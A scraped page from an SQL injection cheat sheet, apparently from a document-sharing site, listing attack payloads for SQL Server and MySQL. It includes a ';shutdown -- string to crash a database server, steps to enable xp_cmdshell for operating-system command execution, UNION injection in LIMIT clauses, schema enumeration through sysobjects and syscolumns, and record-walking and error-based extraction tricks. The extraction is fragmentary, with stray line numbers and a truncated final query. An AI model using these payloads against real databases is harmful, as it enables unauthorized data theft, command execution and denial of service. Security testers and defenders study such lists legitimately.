Sql Injection Cheat Sheet Page 11
ADVERTISEMENT
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18IS_SRVROLEMEMBER (Transact-SQL)
OPENDATASOURCE (Transact-SQL)
INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"
OPENROWSET (Transact-SQL) -
us/library/ms190312.aspx
You can not use sub selects in SQL Server Insert queries.
SQL Injection in LIMIT (M) or ORDER (MSO)
SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT
1,'x'/*,10 ;
If injection is in second limit you can comment it out or use in your union injection
Shutdown SQL Server (S)
When you really pissed off,
';shutdown --
Enabling xp_cmdshell in SQL Server 2005
By default xp_cmdshell and couple of other potentially dangerous stored procedures are
disabled in SQL Server 2005. If you have admin access then you can enable these.
EXEC sp_configure 'show advanced options',1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE
Finding Database Structure in SQL Server (S)
Getting User defined Tables
SELECT name FROM sysobjects WHERE xtype = 'U'
Getting Column Names
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE
name = 'tablenameforcolumnnames')
Moving records (S)
•
Modify WHERE and use
or
,
NOT IN
NOT EXIST
... WHERE users NOT IN ('First User', 'Second User')
SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name
-- very good one
FROM members)
•
Using Dirty Tricks
SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from
ADVERTISEMENT
0 votes
Related Articles
Related forms
Related Categories
Parent category: Education